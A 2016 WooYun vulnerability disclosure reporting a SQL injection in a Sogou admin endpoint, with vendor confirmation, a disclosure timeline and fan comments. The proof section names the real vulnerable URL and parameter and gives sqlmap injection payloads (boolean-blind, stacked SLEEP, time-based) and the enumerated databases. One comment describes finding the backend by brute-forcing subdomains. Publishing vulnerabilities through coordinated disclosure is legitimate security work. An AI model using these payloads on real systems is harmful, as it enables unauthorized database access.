当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170566

漏洞标题:搜狗搜索后台存在SQL注入漏洞

相关厂商:搜狗

漏洞作者: 猪猪侠

提交时间:2016-01-17 12:34

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经确认,细节仅向厂商公开
2016-01-28: 细节向核心白帽子及相关领域专家公开
2016-02-07: 细节向普通白帽子公开
2016-02-17: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

搜狗搜索(www.sogou.com),后台存在SQL注入漏洞

详细说明:

# 注入地址

http://task.www.sogou.com/taskresult?task_id=7917


sogou.png

漏洞证明:

web application technology: PHP 5.5.4, Nginx
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: task_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: task_id=7917 AND 3763=3763
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: task_id=7917; SELECT SLEEP(5)-- 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: task_id=7917 AND SLEEP(5)
---
web application technology: PHP 5.5.4, Nginx
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] mark_oss
[*] test

修复方案:

过滤,或者强制类型转换

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-18 16:41

厂商回复:

感谢支持

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-17 12:35 | s3xy ( 核心白帽子 | Rank:938 漏洞数:124 | 相濡以沫,不如相忘于江湖)

    6

  2. 2016-01-17 12:35 | 玉林嘎 认证白帽子 ( 核心白帽子 | Rank:933 漏洞数:107 )

    前排

  3. 2016-01-17 12:36 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    23333

  4. 2016-01-17 12:38 | imp0rt ( 普通白帽子 | Rank:113 漏洞数:52 | 剑影。。。)

    666

  5. 2016-01-17 12:39 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    都进后台了?屌丝们还在找后台···

  6. 2016-01-17 12:42 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3846 漏洞数:296 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @岛云首席鉴黄师 后台对外网开放啊,www.sogou.com 穷举一下三级子域名就有了。

  7. 2016-01-17 12:46 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    @猪猪侠 我擦 三级的……我就扫了二级的……

  8. 2016-01-17 12:48 | onpu ( 普通白帽子 | Rank:167 漏洞数:37 )

    猪哥发威了

  9. 2016-01-17 12:49 | 路人毛 ( 实习白帽子 | Rank:64 漏洞数:25 | Please speak in Chinese.)

    6

  10. 2016-01-17 12:52 | 来打我呀 ( 路人 | Rank:2 漏洞数:1 | 欢脱跳跃的小鲜肉~)

    卧槽没前排了。。

  11. 2016-01-17 13:06 | Submit ( 普通白帽子 | Rank:527 漏洞数:120 | )

    屌丝无处不在

  12. 2016-01-17 13:25 | whynot ( 普通白帽子 | Rank:573 漏洞数:101 | 为你解冻冰河 为你放弃世界有何不可)

    你都有那么多超级棒棒糖了,还要自由干吗?

  13. 2016-01-17 13:26 | 90Snake ( 普通白帽子 | Rank:148 漏洞数:49 | 人如果没有梦想,跟咸鱼有什么分别)

    卧槽 三级的。 6666

  14. 2016-01-17 13:32 | 小白猫 ( 路人 | Rank:8 漏洞数:4 | 精通各种语言的朗读与抄写,精通各种系统的...)

    我怀疑乌云都是猪猪侠的小号

  15. 2016-01-17 13:37 | 万年死宅 ( 实习白帽子 | Rank:48 漏洞数:20 | 让生命活出精彩!)

    默默给猪哥点赞

  16. 2016-01-17 14:47 | Yosef ( 实习白帽子 | Rank:63 漏洞数:17 | 苦逼程序猿一枚)

    牛牛侠

  17. 2016-01-17 15:02 | StrAge丶 ( 路人 | Rank:16 漏洞数:6 | my love crystal)

    我怀疑乌云都是猪猪侠的小号

  18. 2016-01-17 18:03 | Let a person cry. ( 实习白帽子 | Rank:31 漏洞数:11 | xxoo)

    膜拜...一下子发了那么多,是让他们加班然后过年,对吧,哈哈

  19. 2016-01-17 20:15 | socket ( 实习白帽子 | Rank:38 漏洞数:14 | )

    都进后台了?屌丝们还在找后台···

  20. 2016-01-17 21:54 | 404notfound ( 普通白帽子 | Rank:259 漏洞数:71 | 考研中,有事请留言)

    无敌

  21. 2016-01-18 22:56 | asd ( 路人 | Rank:2 漏洞数:1 | asdasdasdasdasdasdasdasdasdasdasdasdasda...)

    厉害了

  22. 2016-01-19 18:12 | 葫芦岛小弱智 ( 路人 | Rank:19 漏洞数:6 | I want to fresh a Apple table!)

    股市大跌之后,就是猪猪侠重出江湖之时!

  23. 2016-01-27 19:27 | xbuther ( 路人 | Rank:4 漏洞数:3 | 多多交流,一起进步。。。O(∩_∩)O~)

    股市大跌之后,就是猪猪侠重出江湖之时!